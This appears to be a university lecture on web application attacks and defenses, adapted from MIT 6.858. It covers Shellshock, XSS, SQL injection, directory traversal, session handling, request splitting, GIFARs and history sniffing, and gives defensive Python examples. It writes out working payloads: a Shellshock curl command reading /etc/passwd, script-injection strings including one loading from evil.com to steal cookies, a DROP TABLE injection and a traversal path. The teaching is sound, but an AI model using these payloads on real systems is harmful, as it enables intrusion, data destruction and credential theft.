Web Attacks and Defenses
========================
Credits: lecture notes judiciously adapted from MIT 6.858 by Nickolai Zeldovich & James Mickens
Last lecture, we looked at a core security
mechanism for the web: the same-origin policy.
-In this lecture, we'll continue to look at
how we can build secure web applications.
The recent "Shell Shock" bug is a good example
of how difficult it is to design web services
that compose multiple technologies.
-A web client can include extra headers
in its HTTP requests, and determine which
query parameters are in a request. Ex:
GET /query.cgi?searchTerm=cats HTTP/1.1
Host: www.example.com
Custom-header: Custom-value
CGI servers map the various components of the
HTTP request to Unix environment variables.
-Vulnerability: Bash has a parsing bug in the
way that it handles the setting of environment
variables! If a string begins with a certain
set of malformed bytes, bash will continue to
parse the rest of the string and execute any
commands that it finds! For example, if you
set an environment variable to a value like
this . . .
() { :;}; /bin/id
. . . the value will confuse the bash parser, and cause
it to execute the /bin/id command (which
displays the UID and GID information for
the current user).
-Exploit: e.g., curl -H "User-Agent: () { :;}; /bin/cat /etc/passwd" http://vulnerable.com/
-Live demo
Step 1: Fetch a Docker image with the vulnerability.
docker pull sadmin/shellshock
Step 2: Run the command.
docker run -it --rm --entrypoint=/usr/bin/env sadmin/shellshock x='() { :;}; echo vulnerable' bash -c "echo this is a test"
-More information: http://seclists.org/oss-sec/2014/q3/650
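
To make the header-to-environment mapping concrete, here is a minimal
Python sketch of how a CGI-style server might turn a request into
environment variables. The function name cgi_environ is hypothetical; the
HTTP_ prefix convention follows the CGI specification (RFC 3875). The
sketch only builds a dictionary and never launches a shell, so it is
safe to run. The point is that attacker-chosen header bytes land
verbatim in the environment of whatever program the server starts.

```python
from typing import Dict


def cgi_environ(method: str, target: str, headers: Dict[str, str]) -> Dict[str, str]:
    """Map an HTTP request onto CGI-style environment variables."""
    path, _, query = target.partition("?")
    env = {
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": path,
        "QUERY_STRING": query,
    }
    for name, value in headers.items():
        # CGI convention: upper-case the header name, replace "-" with "_",
        # and prefix it with "HTTP_". The value is copied without changes.
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


env = cgi_environ(
    "GET",
    "/query.cgi?searchTerm=cats",
    {"Host": "www.example.com", "User-Agent": "() { :;}; /bin/id"},
)
for key in sorted(env):
    print(key, "=", repr(env[key]))
```

A vulnerable bash started with this environment would treat the
HTTP_USER_AGENT value as a function definition followed by a command.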
Shell Shock is a particular instance of
security bugs which arise from improper
content sanitization. Another type of content
sanitization failure occurs during cross-site
scripting attacks (XSS).
XSS enables attackers to inject client-side
script into Web pages viewed by other users.
Most attacks involve two parties: the attacker and
the web site, or the attacker and the victim client.
An XSS attack involves three parties: the attacker,
a client, and the web site.
The goal of the XSS attack is to steal the client's
cookies, or any other sensitive information that
identifies the client to the web site. With the
legitimate user's token in hand, the attacker can
impersonate the user in interactions with the site.
-Example: Suppose that a CGI script (PHP) embeds
a query string parameter in the HTML that
it generates.
-Demo:
In browser, load these URLs:
http://perso.uclouvain.be/marco.canini/ingi2347/xss-demo.php?name=foo
http://perso.uclouvain.be/marco.canini/ingi2347/xss-demo.php?name=<b>foo</b>
http://perso.uclouvain.be/marco.canini/ingi2347/xss-demo.php?name=<script>alert('XSS');</script>
//The XSS attack doesn't work for this one . . .
//But if we disable the XSS filtering in Firefox, it works . . .
// [https://www.phillips321.co.uk/2012/03/01/xss-browser-filters-disabling-it-for-app-testing/]
//we'll see why later in the lecture.
http://perso.uclouvain.be/marco.canini/ingi2347/xss-demo.php?name=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
//Even though the browser caught the
//straightforward XSS injection, certain
//browser versions incorrectly parse our
//intentionally malformed HTML.
// [For more examples of XSS exploits via
// malformed code, go here:
// https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
// ]
Why is cross-site scripting so prevalent?
-Dynamic web sites incorporate user content in
HTML pages (e.g., comments sections).
-Web sites host uploaded user documents.
*HTML documents can contain arbitrary
Javascript code!
*Non-HTML documents may be content-sniffed
as HTML by browsers.
-Insecure Javascript programs may directly
execute code that comes from external parties
(e.g., eval(), setTimeout(), etc.).
XSS defenses
-Chrome and IE have a built-in feature which
uses heuristics to detect potential cross-site
scripting attacks.
*Ex: Is a script which is about to execute
included in the request that fetched the
enclosing page?
http://foo.com?q=<script src="evil.com/cookieSteal.js"/>
If so, this is strong evidence that something
suspicious is about to happen! The attack
above is called a "reflected XSS attack,"
because the server "reflects" or "returns"
the attacker-supplied code to the user's browser,
executing it in the context of the victim
page.
-This is why our first XSS attack in
the CGI example didn't work--the
browser detected reflected JavaScript
in the URL, and removed the trailing
</script> before it even reached the
CGI server.
-However . . .
*Filters don't have 100% coverage,
because there are a huge number of ways
to encode an XSS attack!
[https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet]
*Problem: Filters can't catch persistent XSS
attacks in which the server saves
attacker-provided data, which is then
permanently distributed to clients.
-Classic example: A "comments" section
which allows users to post HTML
messages.
-Another example: Suppose that a dating
site allows users to include HTML in
their profiles. An attacker can add
HTML that will run in a *different*
user's browser when that user looks
at the attacker's profile! Attacker
could steal the user's cookie.
-Another XSS defense: "httponly" cookies.
*A server can tell a browser that client-side
JavaScript should not be able to access
a cookie. [The server does this by adding
the "HttpOnly" attribute to a "Set-Cookie"
HTTP response header.]
*This is only a partial defense, since the
attacker can still issue requests that
contain a user's cookies (CSRF).
-Privilege separation: Use a separate domain
for untrusted content.
*For example, Google stores untrusted content
in googleusercontent.com (e.g., cached
copies of pages, Gmail attachments).
*Even if XSS is possible in the untrusted
content, the attacker code will run in
a different origin.
*There may still be problems if the content
in googleusercontent.com points to URLs
in google.com.
-Content sanitization: Take untrusted content
and encode it in a way that constrains how
it can be interpreted.
*Ex: Django templates: Define an output
page as a bunch of HTML that has some
"holes" where external content can be
inserted.
[https://docs.djangoproject.com/en/dev/topics/templates/#automatic-html-escaping]
A template might contain code like
this . . .
<b>Hello {{ name }} </b>
. . . where "name" is a variable that is
resolved when the page is processed by
the Django template engine. That engine
will take the value of "name" (e.g.,
from a user-supplied HTTP query string),
and then automatically escape dangerous
characters. For example,
angle brackets < and > --> &lt; and &gt;
double quotes " --> &quot;
This prevents untrusted content from
injecting HTML into the rendered page.
Templates cannot defend against all
attacks! For example . . .
<div class={{ var }}>...</div>
. . . if var equals . . .
'class1 onmouseover=javascript:func()'
. . . then there may be an XSS attack,
depending on how the browser parses
the malformed HTML.
*So, content sanitization kind-of works,
but it's extremely difficult to parse
HTML in an unambiguous way.
*Possibly better approach: Completely
disallow externally-provided HTML,
and force external content to be
expressed in a smaller language
(e.g., Markdown: http://daringfireball.net/projects/markdown/syntax).
Validated Markdown can then be translated
into HTML.
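
The escaping step, and its limits, can be sketched with Python's standard
html.escape function. This is an illustration of the idea, not Django's
template engine; the three render_* helpers are hypothetical names. The
unquoted-attribute case shows why escaping alone does not help when the
template itself leaves the attribute value unquoted: spaces and "=" are
not escaped, so the value can introduce a new attribute.

```python
import html


def render_greeting(name: str) -> str:
    # Escapes &, <, >, and both quote characters before interpolation.
    return "<b>Hello {} </b>".format(html.escape(name, quote=True))


def render_div_unquoted(css_class: str) -> str:
    # Mirrors the risky template: the attribute value is NOT quoted.
    return "<div class={}>...</div>".format(html.escape(css_class, quote=True))


def render_div_quoted(css_class: str) -> str:
    # Quoting the attribute keeps the whole value inside class="...".
    return '<div class="{}">...</div>'.format(html.escape(css_class, quote=True))


attack = "class1 onmouseover=javascript:func()"
print(render_greeting("<script>alert('XSS');</script>"))
print(render_div_unquoted(attack))
print(render_div_quoted(attack))
```

In the unquoted output, onmouseover appears as a separate attribute of
the div; in the quoted output it stays part of the class value.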
-Content Security Policy (CSP): Allows a web
server to tell the browser which kinds of
resources can be loaded, and the allowable
origins for those resources.
*Server specifies one or more headers of
the type "Content-Security-Policy".
*Example:
Content-Security-Policy: default-src 'self' *.mydomain.com
//Only allow content from the page's domain
//and its subdomains.
You can specify separate policies for
where images can come from, where scripts
can come from, frames, plugins, etc.
*CSP also prevents inline JavaScript, and
JavaScript interfaces like eval() which
allow for dynamic JavaScript generation.
-Some browsers allow servers to disable content-type
sniffing (X-Content-Type-Options: nosniff).
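
As a rough sketch, the three header-based defenses above (HttpOnly
cookies, CSP, and nosniff) could be emitted together like this. The
function name security_headers and the cookie name "sessionid" are
assumptions for illustration; the CSP value is the one from the example
above. Only Python's standard http.cookies module is used.

```python
from http.cookies import SimpleCookie
from typing import List, Tuple


def security_headers(session_id: str) -> List[Tuple[str, str]]:
    """Build response headers for a session cookie plus browser-side defenses."""
    cookie = SimpleCookie()
    cookie["sessionid"] = session_id
    # Mark the cookie so that client-side JavaScript cannot read it.
    cookie["sessionid"]["httponly"] = True
    # OutputString() renders only the header value, without "Set-Cookie:".
    set_cookie_value = cookie["sessionid"].OutputString()
    return [
        ("Set-Cookie", set_cookie_value),
        ("Content-Security-Policy", "default-src 'self' *.mydomain.com"),
        ("X-Content-Type-Options", "nosniff"),
    ]


for name, value in security_headers("abc123"):
    print("{}: {}".format(name, value))
```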
SQL injection attacks.
-Suppose that the application needs to issue a SQL
query based on user input:
query = "SELECT *
FROM table
WHERE userid=" + userid
-Problem: adversary can supply userid that changes
SQL query structure, e.g.,
"0; DROP table;"
-What if we add quoting around userid?
query = "SELECT *
FROM table
WHERE userid='" + userid + "'"
The vulnerability still exists! The attacker
can just add another quote as first byte
of userid.
-Real solution: unambiguously encode data.
Ex: replace ' with \', etc.
*SQL libraries provide escaping functions.
-Django defines a query abstraction layer
which sits atop SQL and allows applications
to avoid writing raw SQL (although they can
do it if they really want to).
-(Possibly fake) German license plate which
says ";DROP TABLE" to avoid speeding cameras
which use OCR+SQL to extract license plate
number.
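
A small sketch of the problem and one common fix, using Python's built-in
sqlite3 module with an in-memory database. The table name "users" and the
helper names are made up for the example. Note that the fix shown is a
parameterized query (the driver keeps data separate from the query text)
rather than manual escaping; it serves the same goal of unambiguous
encoding. The attack string uses "OR 1=1" because sqlite3's execute()
runs only one statement at a time.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, userid: str) -> List[str]:
    # Vulnerable: user input is pasted into the query text.
    query = "SELECT name FROM users WHERE userid=" + userid
    return sorted(row[0] for row in conn.execute(query))


def lookup_safe(conn: sqlite3.Connection, userid: str) -> List[str]:
    # The "?" placeholder makes the driver treat userid purely as data.
    rows = conn.execute("SELECT name FROM users WHERE userid=?", (userid,))
    return sorted(row[0] for row in rows)


conn = make_db()
print(lookup_unsafe(conn, "0 OR 1=1"))  # the input changed the query structure
print(lookup_safe(conn, "0 OR 1=1"))    # the input is compared as a plain value
```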
You can also run into problems if untrusted entities
can supply filenames. These attacks are called
directory traversal attacks.
-Ex: Suppose that a web server reads files
based on user-supplied parameters.
open("/www/images/" + filename)
Problem: filename might look like this:
../../../../../etc/passwd
As with SQL injection, the server must
sanitize the user input: the server must
reject file names with slashes, or encode
the slashes in some way.
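
A minimal sketch of the check, assuming the /www/images directory from
the example above. The function name resolve_image_path is hypothetical.
It applies the policy from the notes (reject names containing slashes)
and then, as an extra safeguard that is not in the notes, confirms that
the canonical path still lies under the base directory.

```python
import os

BASE_DIR = "/www/images"  # directory from the example above


def resolve_image_path(filename: str, base_dir: str = BASE_DIR) -> str:
    """Return the full path for filename, or raise ValueError if it is unsafe."""
    # Policy from the notes: reject any name containing a path separator.
    if "/" in filename or "\\" in filename or filename in ("", ".", ".."):
        raise ValueError("illegal file name: {!r}".format(filename))
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    # Extra safeguard: after resolving symlinks and "..", the result must
    # still be inside the base directory.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory: {!r}".format(filename))
    return candidate


print(resolve_image_path("cat.jpg"))
try:
    resolve_image_path("../../../../../etc/passwd")
except ValueError as err:
    print("rejected:", err)
```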
What is Django?
-Moderately popular web framework, used by
some large sites like Instagram, Mozilla,
and Pinterest.
*A "web framework" is a software system
that provides infrastructure for tasks
like database accesses, session management,
and the creation of templated content
that can be used throughout a site.
*Other frameworks are more popular:
PHP, Ruby on Rails.
*In the enterprise world, Java servlets
and ASP are also widely used.
-Django developers have put some amount of
thought into security.
*So, Django is a good case study to
see how people implement web security
in practice.
-Django is probably better in terms of
security than some of the alternatives
like PHP or Ruby on Rails, but the devil
is in the details.
Session management: cookies. [http://pdos.csail.mit.edu/papers/webauth:sec10.pdf]
Django, like many web frameworks, puts a
random session ID in the cookie.
-The Session ID refers to an entry in some session
table on the web server. The entry stores a bunch
of per-user information.
-Session cookies are sensitive: adversary can use
them to impersonate a user!
*As we discussed last lecture, the same-origin
policy helps to protect cookies . . .
*. . . but you shouldn't share a domain with
sites that you don't trust! Otherwise, those
sites can launch a session fixation attack:
1) Attacker sets the session ID in
the shared cookie.
2) User navigates to the victim site;
the attacker-chosen session ID is
sent to the server and used to
identify the user's session entry.
3) Later, the attacker can navigate
to the victim site using the
attacker-chosen session ID, and
access the user's state!
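
A sketch of a server-side session table keyed by a random session ID.
The class and method names are hypothetical, and this is not how Django
implements sessions. The login() method also issues a fresh ID instead
of reusing whatever the browser presented; that step is an assumption
added here (a common mitigation for the fixation attack above), not
something the notes prescribe.

```python
import secrets
from typing import Dict, Optional


class SessionTable:
    """In-memory map from session ID to per-user state."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Dict[str, str]] = {}

    def create(self) -> str:
        # 32 random bytes, URL-safe encoded: infeasible for an attacker to guess.
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = {}
        return session_id

    def lookup(self, session_id: str) -> Optional[Dict[str, str]]:
        return self._sessions.get(session_id)

    def login(self, presented_id: Optional[str], username: str) -> str:
        # Drop the ID the browser presented (it may be attacker-chosen)
        # and bind the user to a newly generated ID instead.
        if presented_id is not None:
            self._sessions.pop(presented_id, None)
        new_id = self.create()
        self._sessions[new_id]["user"] = username
        return new_id


table = SessionTable()
issued = table.login("attacker-chosen-id", "alice")
print(table.lookup("attacker-chosen-id"))  # the fixed ID maps to nothing
print(table.lookup(issued))
```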
-Hmmm, but what if we don't want to have server-side
state for every logged in user?
Stateless cookies
-If you don't have the notion of a session, then
you need to authenticate every request!
*Idea: Authenticate the cookie using cryptography.
*Primitive: Message authentication codes (MACs)
-Think of it like a keyed hash, e.g.,
HMAC-SHA1: H(k, m)
-Client and server share a key; client
uses the key to compute a MAC over the
message, and the server uses the key to
verify that MAC.
*AWS S3 REST Services use this kind of cookie
[http://docs.aws.amazon.com/AmazonS3/latest/dev/RESTAuthentication.html].
-Amazon gives each developer an AWS Access
Key ID, and an AWS secret key. Each request
looks like this:
GET /photos/cat.jpg HTTP/1.1
Host: johndoe.s3.amazonaws.com
Date: Mon, 26 Mar 2007 19:37:58 +0000
Authorization: AWS AKIAIOSFODNN7EXAMPLE:frJIUN8DYpKDtOLCwoyllqDzg=
                   |__________________| |________________________|
                      Access key ID           MAC signature
-Here's what is signed (this is slightly
simplified, see the link above for the
full story):
StringToSign = HTTP-Verb + "\n" +
Content-MD5 + "\n" +
Content-Type + "\n" +
Date + "\n" +
ResourceName
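
A sketch of signing the simplified StringToSign above with HMAC-SHA1 and
base64-encoding the result. The secret key and resource name below are
placeholders, and the real AWS scheme signs additional fields (see the
link above), so this will not reproduce actual AWS signatures.

```python
import base64
import hashlib
import hmac


def string_to_sign(verb: str, content_md5: str, content_type: str,
                   date: str, resource: str) -> str:
    # Same field order as the simplified StringToSign in the notes.
    return "\n".join([verb, content_md5, content_type, date, resource])


def sign(secret_key: str, message: str) -> str:
    digest = hmac.new(secret_key.encode("utf-8"),
                      message.encode("utf-8"),
                      hashlib.sha1).digest()
    return base64.b64encode(digest).decode("ascii")


def verify(secret_key: str, message: str, signature: str) -> bool:
    # compare_digest avoids leaking the position of the first mismatch.
    return hmac.compare_digest(sign(secret_key, message).encode("ascii"),
                               signature.encode("utf-8"))


SECRET = "hypothetical-secret-key"  # placeholder, not a real AWS key
msg = string_to_sign("GET", "", "", "Mon, 26 Mar 2007 19:37:58 +0000",
                     "/photos/cat.jpg")
sig = sign(SECRET, msg)
print(verify(SECRET, msg, sig))
```

The server recomputes the MAC from the request fields and its own copy
of the secret key; any change to a signed field makes verification fail.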
*Note that this kind of cookie doesn't expire in
the traditional sense (although the server will
reject the request if Amazon has revoked the
user's key).
-You can embed an "expiration" field in
a *particular* request, and then hand
that URL to a third-party, such that,
if the third-party waits too long, AWS
will reject the request as expired.
AWSAccessKeyId=AKIAIOSFODNN7EXAMPLE&Expires=1141889120&Signature=vjbyPxybd...
                                    |________________|
                                  Included in the string
                                  that's covered by the
                                  signature!
*Note that the format for the string-to-hash
should provide unambiguous parsing!
-Ex: No component should be allowed to
embed the escape character, otherwise
the server-side parser may get confused.
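
To illustrate the parsing point, the sketch below shows how naive
concatenation makes two different (username, expiry) pairs hash
identically, and one way to avoid that by length-prefixing each field
before computing the MAC. All names and the server key are hypothetical,
and HMAC-SHA256 is used here in place of the HMAC-SHA1 mentioned above.

```python
import hashlib
import hmac
import time
from typing import Optional

SERVER_KEY = b"hypothetical-server-secret"


def encode_fields(*fields: str) -> bytes:
    # Length-prefix every field so that field boundaries cannot shift.
    out = b""
    for field in fields:
        raw = field.encode("utf-8")
        out += str(len(raw)).encode("ascii") + b":" + raw
    return out


def _tag(username: str, expires_text: str) -> str:
    return hmac.new(SERVER_KEY, encode_fields(username, expires_text),
                    hashlib.sha256).hexdigest()


def make_cookie(username: str, expires_at: int) -> str:
    return "{}|{}|{}".format(username, expires_at, _tag(username, str(expires_at)))


def check_cookie(cookie: str, now: Optional[int] = None) -> Optional[str]:
    """Return the username if the cookie is authentic and unexpired, else None."""
    try:
        username, expires_text, tag = cookie.rsplit("|", 2)
        expires_at = int(expires_text)
    except ValueError:
        return None
    expected = _tag(username, expires_text)
    if not hmac.compare_digest(expected.encode("ascii"), tag.encode("utf-8")):
        return None
    current = int(time.time()) if now is None else now
    return username if current <= expires_at else None


# Naive concatenation cannot tell these two pairs apart; the encoding can.
print("alice1" + "23" == "alice" + "123")
print(encode_fields("alice1", "23") == encode_fields("alice", "123"))
```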
-Q: How do you log out with this kind of cookie design?
A: Impossible, if the server is stateless (closing
a session would require a server-side table
of revoked cookies).
*If server can be stateful, session IDs make
this much simpler.
*There's a fundamental trade-off between
reducing server-side memory state and
increasing server-side computation overhead
for cryptography.
Alternatives to cookies for session management.
-Use HTML5 local storage, and implement your own
authentication in Javascript.
*Some web frameworks like Meteor do this.
[https://www.meteor.com/blog/2014/03/14/session-cookies]
*Benefit: The cookie is not sent over the
network to the server.
*Benefit: Your authentication scheme is not
subject to complex same-origin policy for
cookies (e.g., DOM storage is bound to
a single origin, unlike a cookie, which
can be bound to multiple subdomains).
-Client-side X.509 certificates.
*Benefit: Web applications can't steal
or explicitly manipulate each other's
certificates.
*Drawback: Have weak story for revocation
(we'll talk about this more in future
lectures).
*Drawback: Poor usability---users don't
want to manage a certificate for each
site that they visit!
*Benefit/drawback: There isn't a notion of
a session, since the certificate is "always
on." For important operations, the application
will have to prompt for a password.
The web stack has some protocol ambiguities
that can lead to security holes.
-HTTP header injection from XMLHttpRequests
*Javascript can ask browser to add extra
headers in the request. So, what happens
if we do this?
var x = new XMLHttpRequest();
x.open("POST", "http://foo.com");
x.setRequestHeader("Content-Length", "7");
//Overrides the browser-computed field!
x.send("Gotcha!\r\n" +
"GET /something.html HTTP/1.1\r\n" +
"Host: bar.com");
The server at foo.com may interpret this as
two separate requests! Later, when the browser
receives the response to the second request, it
may overwrite a cache entry belonging to bar.com
with content from foo.com!
*Solution: Prevent XMLHttpRequests from setting
sensitive fields like "Host:" or "Content-Length".
*Takehome point: Unambiguous encoding is
critical! Build reliable escaping/encoding!
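
A sketch of why a forged Content-Length splits one request into two. The
parser below is a hypothetical, deliberately simple stand-in for a
server that frames requests by Content-Length; the wire bytes are
modeled on the request above, with the header understating the body
length.

```python
from typing import List


def split_requests(stream: bytes) -> List[bytes]:
    """Frame a byte stream into requests using each Content-Length header."""
    requests = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        length = 0
        for line in head.split(b"\r\n")[1:]:  # skip the request line
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        body, stream = rest[:length], rest[length:]
        requests.append(head + sep + body)
        # Tolerate the line break left between pipelined requests.
        stream = stream.lstrip(b"\r\n")
    return requests


wire = (
    b"POST / HTTP/1.1\r\n"
    b"Host: foo.com\r\n"
    b"Content-Length: 7\r\n"
    b"\r\n"
    b"Gotcha!\r\n"
    b"GET /something.html HTTP/1.1\r\n"
    b"Host: bar.com"
)
for number, request in enumerate(split_requests(wire), start=1):
    print(number, request.split(b"\r\n")[0])
```

Because the declared length covers only "Gotcha!", everything after it
is parsed as a second request naming bar.com as its host.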
-URL parsing ("The Tangled Web" page 154)
*Flash had a slightly different URL parser than
the browser.
*Suppose the URL was http://example.com:80@foo.com/
-Flash would compute the origin as
"example.com".
-Browser would compute the origin as
"foo.com".
*Bad idea: complex parsing rules just to
determine the principal.
*Bad idea: re-implementing complex parsing
code.
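
A sketch of how two parsers can disagree about the host of a URL that
carries a "user:password@" part. The URL used here is illustrative.
naive_host is a hypothetical, deliberately flawed parser written for
this example (it is not Flash's actual code); origin_host uses Python's
standard urllib.parse.

```python
from urllib.parse import urlsplit


def origin_host(url: str) -> str:
    # Standard parsing: text before "@" is userinfo, not the host.
    return urlsplit(url).hostname or ""


def naive_host(url: str) -> str:
    # Flawed: takes everything after "//" up to the first ":" or "/".
    rest = url.split("//", 1)[1]
    for index, char in enumerate(rest):
        if char in ":/":
            return rest[:index]
    return rest


url = "http://example.com:80@foo.com/"
print(naive_host(url))
print(origin_host(url))
```

If an access check uses one parser and the network stack uses the
other, the check is made against the wrong principal.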
-Here's a hilarious/terrifying way to launch
attacks using Java applets that are stored
in the .jar format.
*In 2007, Lifehacker.com posted an article
which described how you could hide .zip
files inside of .gif files.
*Leverage the fact that image renderers
process a file top-down, whereas decompressors
for .zip files typically start from the end
and go upwards.
*Attackers realized that .jar files are
based on the .zip format!
*THUS THE GIFAR WAS BORN: half-gif, half-jar,
all-evil.
-Really simple to make a GIFAR: Just
use "cat" on Linux or "copy /b" on Windows.
-Suppose that target.com only allows
external parties to upload image
objects. The attacker can upload a
GIFAR, and the GIFAR will pass
target.com's image validation tests!
-Then, if the attacker can launch
an XSS attack, the attacker can
inject HTML which refers to the
".gif" as an applet.
<applet code="attacker.class"
archive="attacker.gif"
...>
-The browser will load that applet
and give it the authority of
target.com!
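
The concatenation trick can be sketched with Python's standard zipfile
module, which locates the archive directory from the end of the file and
so tolerates data prepended to the archive. The image bytes below are
only a GIF magic number plus padding (a stand-in for a real image), the
member content is not real bytecode, and looks_like_gif is a
hypothetical, overly simple validator.

```python
import io
import zipfile
from typing import Dict


def make_polyglot(image_bytes: bytes, members: Dict[str, bytes]) -> bytes:
    """Append a zip archive (the basis of .jar) to image data."""
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return image_bytes + archive.getvalue()


def looks_like_gif(data: bytes) -> bool:
    # Naive validation: checks only the leading magic bytes.
    return data[:6] in (b"GIF87a", b"GIF89a")


fake_image = b"GIF89a" + b"\x00" * 32
blob = make_polyglot(fake_image, {"attacker.class": b"not real bytecode"})

print(looks_like_gif(blob))
with zipfile.ZipFile(io.BytesIO(blob)) as zf:
    print(zf.namelist())
```

The same bytes pass the top-down image check and still open as an
archive when read from the end.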
Web applications are also vulnerable to covert channel
attacks.
-A covert channel is a mechanism which allows two
applications to exchange information, even though
the security model prohibits those applications
from communicating.
*The channel is "covert" because it doesn't
use official mechanisms for cross-app
communication.
-Example #1: CSS-based sniffing attacks
*Attacker has a website that he can convince
the user to visit.
*Attacker goal: Figure out the other websites
that the user has visited (e.g., to determine
the user's political views, medical history,
etc.).
*Exploit vector: A web browser uses different
colors to display visited versus unvisited
links! So, attacker page can generate a
big list of candidate URLs, and then inspect
the colors to see if the user has visited
any of them.
-Can check thousands of URLs a second!
-Can go breadth-first, find hits for
top-level domains, then go depth-first
for each hit.
*Fix: Force getComputedStyle() and related
JavaScript interfaces to always say that a
link is unvisited. [https://blog.mozilla.org/security/2010/03/31/plugging-the-css-history-leak/]
-Example #2: Cache-based attacks
*Attacker setup and goal are the same as before.
*Exploit vector: It's much faster for a browser
to access data that's cached instead of fetching
it over the network. So, attacker page can
generate a list of candidate images, try to
load them, and see which ones load quickly!
*This attack can reveal your location if the
candidate images are geographically
specific, e.g., Google Map tiles.
[http://w2spconf.com/2014/papers/geo_inference.pdf]
*Fix: No good ones. A page could never cache
objects, but this will hurt performance. But
suppose that a site doesn't cache anything.
Is it safe from history sniffing? No!
-Example #3: DNS-based attacks
*Attacker setup and goal are the same as
before.
*Exploit vector: Attacker page generates
references to objects in various domains.
If the user has already accessed objects
from that domain, the hostnames will already
reside in the DNS cache, making subsequent
object accesses faster! [http://sip.cs.princeton.edu/pub/webtiming.pdf]
*Fix: No good ones. Could use raw IP addresses
for links, but this breaks a lot of things
(e.g., DNS-based load balancing). However,
suppose that a site doesn't cache anything
and uses raw IP addresses for hostnames. Is
it safe from history sniffing? No!
-Example #4: Rendering attacks.
*Attacker setup and goal are the same as before.
*Exploit vector: Attacker page loads a candidate
URL in an iframe. Before the browser has fetched
the content, the attacker page can access . . .
window.frames[1].location.href
. . . and read the value that the attacker set.
However, once the browser has fetched the
content, accessing that reference will return
"undefined" due to the same-origin policy. So,
the attacker can poll the value and see how
long it takes to turn "undefined". If it takes
a long time, the page must not have been
cached! [http://lcamtuf.coredump.cx/cachetime/firefox.html]
*Fix: Stop using computers.
There are many other aspects to building a
secure web application.
-Ex: ensure proper access control for server-side
operations.
*Django provides Python decorators to
check access control rules.
-Ex: Maintain logs for auditing, prevent
an attacker from modifying the log.
Web application security is now critical, given how
popular web applications are and how attractive they
are to malicious attackers.
Developers need to be aware of security issues and establish
best practices for doing code reviews.
There are also many code analysis tools that help by trying to
automatically find possible application vulnerabilities.
There are also automated testing and penetration testing tools.
And remember, always sanitize your inputs!